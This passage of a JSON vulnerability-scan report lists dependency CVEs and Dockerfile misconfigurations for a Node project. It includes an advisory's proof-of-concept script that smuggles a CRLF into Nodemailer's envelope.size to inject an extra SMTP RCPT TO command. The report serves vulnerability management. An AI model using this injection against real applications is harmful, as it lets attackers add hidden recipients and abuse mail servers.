1167-1183\n\nThe `size` property reaches this code path through `MimeNode.setEnvelope()` in `lib/mime-node/index.js` (lines 854-858), which copies all non-standard envelope properties verbatim:\n\n```javascript\nconst standardFields = ['to', 'cc', 'bcc', 'from'];\nObject.keys(envelope).forEach(key => {\n if (!standardFields.includes(key)) {\n this._envelope[key] = envelope[key];\n }\n});\n```\n\nSince `_sendCommand()` writes the command string followed by `\\r\\n` to the raw TCP socket, a CRLF in the `size` value terminates the `MAIL FROM` command and starts a new SMTP command.\n\nNote: by default, Nodemailer constructs the envelope automatically from the message's `from`/`to` fields and does not include `size`. This vulnerability requires the application to explicitly pass a custom `envelope` object with a `size` property to `sendMail()`. \nWhile this limits the attack surface, applications that expose envelope configuration to users are affected.\n\n### PoC\nave the following as `poc.js` and run with `node poc.js`:\n\n```javascript\nconst net = require('net');\nconst nodemailer = require('nodemailer');\n\n// Minimal SMTP server that logs raw commands\nconst server = net.createServer(socket => {\n socket.write('220 localhost ESMTP\\r\\n');\n let buffer = '';\n socket.on('data', chunk => {\n buffer += chunk.toString();\n const lines = buffer.split('\\r\\n');\n buffer = lines.pop();\n for (const line of lines) {\n if (!line) continue;\n console.log('C:', line);\n if (line.startsWith('EHLO')) {\n socket.write('250-localhost\\r\\n250-SIZE 10485760\\r\\n250 OK\\r\\n');\n } else if (line.startsWith('MAIL FROM')) {\n socket.write('250 OK\\r\\n');\n } else if (line.startsWith('RCPT TO')) {\n socket.write('250 OK\\r\\n');\n } else if (line === 'DATA') {\n socket.write('354 Start\\r\\n');\n } else if (line === '.') {\n socket.write('250 OK\\r\\n');\n } else if (line.startsWith('QUIT')) {\n socket.write('221 Bye\\r\\n');\n socket.end();\n }\n }\n });\n});\n\nserver.listen(0, '127.0.0.1', () => {\n const port = server.address().port;\n console.log('SMTP server on port', port);\n console.log('Sending email with injected RCPT TO...\\n');\n\n const transporter = nodemailer.createTransport({\n host: '127.0.0.1',\n port,\n secure: false,\n tls: { rejectUnauthorized: false },\n });\n\n transporter.sendMail({\n from: 'sender@example.com',\n to: 'recipient@example.com',\n subject: 'Normal email',\n text: 'This is a normal email.',\n envelope: {\n from: 'sender@example.com',\n to: ['recipient@example.com'],\n size: '100\\r\\nRCPT TO:',\n },\n }, (err) => {\n if (err) console.error('Error:', err.message);\n console.log('\\nExpected output above:');\n console.log(' C: MAIL FROM: SIZE=100');\n console.log(' C: RCPT TO: <-- INJECTED');\n console.log(' C: RCPT TO:');\n server.close();\n transporter.close();\n });\n});\n```\n\n**Expected output:**\n```\nSMTP server on port 12345\nSending email with injected RCPT TO...\n\nC: EHLO [127.0.0.1]\nC: MAIL FROM: SIZE=100\nC: RCPT TO:\nC: RCPT TO:\nC: DATA\n...\nC: .\nC: QUIT\n```\n\nThe `RCPT TO:` line is injected by the CRLF in the `size` field, silently adding an extra recipient to the email.\n\n### Impact\nThis is an SMTP command injection vulnerability. An attacker who can influence the `envelope.size` property in a `sendMail()` call can:\n\n- **Silently add hidden recipients** to outgoing emails via injected `RCPT TO` commands, receiving copies of all emails sent through the affected transport\n- **Inject arbitrary SMTP commands** (e.g., `RSET`, additional `MAIL FROM` to send entirely separate emails through the server)\n- **Leverage the sending organization's SMTP server reputation** for spam or phishing delivery\n\nThe severity is mitigated by the fact that the `envelope` object must be explicitly provided by the application. Nodemailer's default envelope construction from message headers does not include `size`. Applications that pass through user-controlled data to the envelope options (e.g., via API parameters, admin panels, or template configurations) are vulnerable.\n\nAffected versions: at least v8.0.3 (current); likely all versions where `envelope.size` is supported.", "Severity": "LOW", "VendorSeverity": { "ghsa": 1 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N", "V40Score": 2.3 } }, "References": [ "https://github.com/nodemailer/nodemailer", "https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651", "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-c7w3-x93f-qmm8" ], "PublishedDate": "2026-03-26T22:26:46Z", "LastModifiedDate": "2026-03-26T22:26:46Z" }, "context": { "sbom": { "name": "nodemailer", "version": "6.10.1", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 6.666666666666666, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 2, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a6ff7b0fa39fdb3f", "ruleId": "CVE-2026-41305", "severity": "MEDIUM", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "postcss: PostCSS: Cross-Site Scripting (XSS) via improper escaping of style closing tags", "title": "CVE-2026-41305", "description": "PostCSS takes a CSS file and provides an API to analyze and modify its rules by transforming the rules into an Abstract Syntax Tree. Versions prior to 8.5.10 do not escape `` sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML `` in CSS values breaks out of the style context, enabling XSS. Version 8.5.10 fixes the issue.", "remediation": "https://avd.aquasec.com/nvd/cve-2026-41305", "references": [], "tags": [ "vulnerability", "pkg:postcss@8.4.31" ], "risk": { "cwe": [ "CWE-79" ] }, "raw": { "VulnerabilityID": "CVE-2026-41305", "VendorIDs": [ "GHSA-qx2v-qp2m-jg93" ], "PkgID": "postcss@8.4.31", "PkgName": "postcss", "PkgIdentifier": { "PURL": "pkg:npm/postcss@8.4.31", "UID": "d845910d063cee9a" }, "InstalledVersion": "8.4.31", "FixedVersion": "8.5.10", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41305", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:0086ad0890ab40dce9aff6b30459bf2f3c009f942faa4825d50709ee67cab3d6", "Title": "postcss: PostCSS: Cross-Site Scripting (XSS) via improper escaping of style closing tags", "Description": "PostCSS takes a CSS file and provides an API to analyze and modify its rules by transforming the rules into an Abstract Syntax Tree. Versions prior to 8.5.10 do not escape `` sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML `` in CSS values breaks out of the style context, enabling XSS. Version 8.5.10 fixes the issue.", "Severity": "MEDIUM", "CweIDs": [ "CWE-79" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-41305", "https://github.com/postcss/postcss", "https://github.com/postcss/postcss/releases/tag/8.5.10", "https://github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93", "https://nvd.nist.gov/vuln/detail/CVE-2026-41305", "https://www.cve.org/CVERecord?id=CVE-2026-41305" ], "PublishedDate": "2026-04-24T03:16:11.547Z", "LastModifiedDate": "2026-04-24T17:16:21.5Z" }, "context": { "sbom": { "name": "postcss", "version": "8.4.31", "path": "/package-lock.json" } }, "compliance": { "owaspTop10_2021": [ "A03:2021" ], "cweTop25_2024": [ { "id": "CWE-79", "rank": 1, "category": "Injection" } ], "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "DETECT", "category": "DE.CM", "subcategory": "DE.CM-8", "description": "Vulnerability scans are performed" }, { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.2.4", "description": "Prevent XSS attacks in bespoke software", "priority": "CRITICAL" }, { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1190", "techniqueName": "Exploit Public-Facing Application", "subtechnique": "", "subtechniqueName": "" }, { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 13.349866666666665, "epss": 0.00031, "epss_percentile": 0.09168, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.00124, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "62517a0411bc2994", "ruleId": "CVE-2026-45740", "severity": "MEDIUM", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "protobufjs: Denial of Service via unbounded recursive JSON descriptor expansion", "title": "CVE-2026-45740", "description": "protobufjs compiles protobuf definitions into JavaScript (JS) functions. Prior to 7.5.8 and 8.2.0, protobufjs could recurse without a depth limit while expanding nested JSON descriptors through Root.fromJSON() and Namespace.addJSON(). A crafted JSON descriptor with deeply nested namespace definitions could cause the JavaScript call stack to be exhausted during descriptor loading. This vulnerability is fixed in 7.5.8 and 8.2.0.", "remediation": "https://avd.aquasec.com/nvd/cve-2026-45740", "references": [], "tags": [ "vulnerability", "pkg:protobufjs@7.5.6" ], "risk": { "cwe": [ "CWE-674" ] }, "raw": { "VulnerabilityID": "CVE-2026-45740", "VendorIDs": [ "GHSA-jggg-4jg4-v7c6" ], "PkgID": "protobufjs@7.5.6", "PkgName": "protobufjs", "PkgIdentifier": { "PURL": "pkg:npm/protobufjs@7.5.6", "UID": "11481e02f6a2a6cd" }, "InstalledVersion": "7.5.6", "FixedVersion": "7.5.8, 8.2.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-45740", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:0c7c535ab3a0329218c83c03c24db05aed8e9bc3de59ef7112b23085b7c52d89", "Title": "protobufjs: Denial of Service via unbounded recursive JSON descriptor expansion", "Description": "protobufjs compiles protobuf definitions into JavaScript (JS) functions. Prior to 7.5.8 and 8.2.0, protobufjs could recurse without a depth limit while expanding nested JSON descriptors through Root.fromJSON() and Namespace.addJSON(). A crafted JSON descriptor with deeply nested namespace definitions could cause the JavaScript call stack to be exhausted during descriptor loading. This vulnerability is fixed in 7.5.8 and 8.2.0.", "Severity": "MEDIUM", "CweIDs": [ "CWE-674" ], "VendorSeverity": { "ghsa": 2, "nvd": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/protobufjs/protobuf.js", "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-jggg-4jg4-v7c6", "https://nvd.nist.gov/vuln/detail/CVE-2026-45740" ], "PublishedDate": "2026-05-13T16:17:00.52Z", "LastModifiedDate": "2026-05-13T20:50:15.587Z" }, "context": { "sbom": { "name": "protobufjs", "version": "7.5.6", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 13.36426666666667, "epss": 0.00058, "epss_percentile": 0.1822, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.00232, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4aee8c6d135a7c0c", "ruleId": "CVE-2026-45736", "severity": "MEDIUM", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "ws is an open source WebSocket client and server for Node.js. Prior to ...", "title": "CVE-2026-45736", "description": "ws is an open source WebSocket client and server for Node.js. Prior to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument. This vulnerability is fixed in 8.20.1.", "remediation": "https://avd.aquasec.com/nvd/cve-2026-45736", "references": [], "tags": [ "vulnerability", "pkg:ws@8.18.3" ], "risk": { "cwe": [ "CWE-908" ] }, "raw": { "VulnerabilityID": "CVE-2026-45736", "VendorIDs": [ "GHSA-58qx-3vcg-4xpx" ], "PkgID": "ws@8.18.3", "PkgName": "ws", "PkgIdentifier": { "PURL": "pkg:npm/ws@8.18.3", "UID": "f8dc386179443300" }, "InstalledVersion": "8.18.3", "FixedVersion": "8.20.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-45736", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:54b51dc0dfb29c3a34ed11a3c1a3c26e8c1546c9a2c83cff9b3d42b63d290b98", "Title": "ws is an open source WebSocket client and server for Node.js. Prior to ...", "Description": "ws is an open source WebSocket client and server for Node.js. Prior to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument. This vulnerability is fixed in 8.20.1.", "Severity": "MEDIUM", "CweIDs": [ "CWE-908" ], "VendorSeverity": { "ghsa": 2, "nvd": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "V3Score": 4.4 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 7.5 } }, "References": [ "https://github.com/websockets/ws", "https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086", "https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpx", "https://nvd.nist.gov/vuln/detail/CVE-2026-45736" ], "PublishedDate": "2026-05-15T15:16:54.103Z", "LastModifiedDate": "2026-05-19T14:39:20.353Z" }, "context": { "sbom": { "name": "ws", "version": "8.18.3", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 13.338133333333333, "epss": 9e-05, "epss_percentile": 0.00961, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.00036, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "eba667be954e5b93", "ruleId": "Image user should not be 'root'", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "Dockerfile.dev", "startLine": 0 }, "message": "Image user should not be 'root'", "title": "Image user should not be 'root'", "description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.", "remediation": "https://avd.aquasec.com/misconfig/ds-0002", "references": [], "tags": [ "misconfig" ], "raw": { "Type": "Dockerfile Security Check", "ID": "DS-0002", "Title": "Image user should not be 'root'", "Description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.", "Message": "Specify at least 1 USER command in Dockerfile with non-root user as argument", "Namespace": "builtin.dockerfile.DS002", "Query": "data.builtin.dockerfile.DS002.deny", "Resolution": "Add 'USER ' line to the Dockerfile", "Severity": "HIGH", "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0002", "References": [ "https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", "https://avd.aquasec.com/misconfig/ds-0002" ], "Status": "FAIL", "CauseMetadata": { "Provider": "Dockerfile", "Service": "general" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 23.333333333333336, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "63eaab178df076b0", "ruleId": "No HEALTHCHECK defined", "severity": "LOW", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "Dockerfile.dev", "startLine": 0 }, "message": "No HEALTHCHECK defined", "title": "No HEALTHCHECK defined", "description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", "remediation": "https://avd.aquasec.com/misconfig/ds-0026", "references": [], "tags": [ "misconfig" ], "raw": { "Type": "Dockerfile Security Check", "ID": "DS-0026", "Title": "No HEALTHCHECK defined", "Description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", "Message": "Add HEALTHCHECK instruction in your Dockerfile", "Namespace": "builtin.dockerfile.DS026", "Query": "data.builtin.dockerfile.DS026.deny", "Resolution": "Add HEALTHCHECK instruction in Dockerfile", "Severity": "LOW", "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0026", "References": [ "https://blog.aquasec.com/docker-security-best-practices", "https://avd.aquasec.com/misconfig/ds-0026" ], "Status": "FAIL", "CauseMetadata": { "Provider": "Dockerfile", "Service": "general" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 6.666666666666666, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 2, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "e68d0bbfcfdade0c", "ruleId": "Image user should not be 'root'", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "Dockerfile.production", "startLine": 0 }, "message": "Image user should not be 'root'", "title": "Image user should not be 'root'", "description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.", "remediation": "https://avd.aquasec.com/misconfig/ds-0002", "references": [], "tags": [ "misconfig" ], "raw": { "Type": "Dockerfile Security Check", "ID": "DS-0002", "Title": "Image user should not be 'root'", "Description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.", "Message": "Specify at least 1 USER command in Dockerfile with non-root user as argument", "Namespace": "builtin.dockerfile.DS002", "Query": "data.builtin.dockerfile.DS002.deny", "Resolution": "Add 'USER ' line to the Dockerfile", "Severity": "HIGH", "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0002", "References": [ "https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", "https://avd.aquasec.com/misconfig/ds-0002" ], "Status": "FAIL", "CauseMetadata": { "Provider": "Dockerfile", "Service": "general" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 23.333333333333336, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7b29c0ae384e49f6", "ruleId": "No HEALTHCHECK defined", "severity": "LOW", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "Dockerfile.production", "startLine": 0 }, "message": "No HEALTHCHECK defined", "title": "No HEALTHCHECK defined", "description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", "remediation": "https://avd.aquasec.com/misconfig/ds-0026", "references": [], "tags": [ "misconfig" ], "raw": { "Type": "Dockerfile Security Check", "ID": "DS-0026", "Title": "No HEALTHCHECK defined", "Description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", "Message": "Add HEALTHCHECK instruction in your Dockerfile", "Namespace": "builtin.dockerfile.DS026", "Query": "data.builtin.dockerfile.DS026.deny", "Resolution": "Add HEALTHCHECK instruction in Dockerfile", "Severity": "LOW", "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0026", "References": [ "https://blog.aquasec.com/docker-security-best-practices", "https://avd.aquasec.com/misconfig/ds-0026" ], "Status": "FAIL", "CauseMetadata": { "Provider": "Dockerfile", "Service": "general" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 6.666666666666666, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 2, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c5cf815654ece26c", "ruleId": "Image user should not be 'root'", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "Dockerfile.test", "startLine": 0 }, "message": "Image user should not be 'root'", "title": "Image user should not be 'root'", "description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.", "remediation": "https://avd.aquasec.com/misconfig/ds-0002", "references": [], "tags": [ "misconfig" ], "raw": { "Type": "Dockerfile Security Check", "ID": "DS-0002", "Title": "Image user should not be 'root'", "Description": "Running containers with 'root' user can lead to a container escape situation. It 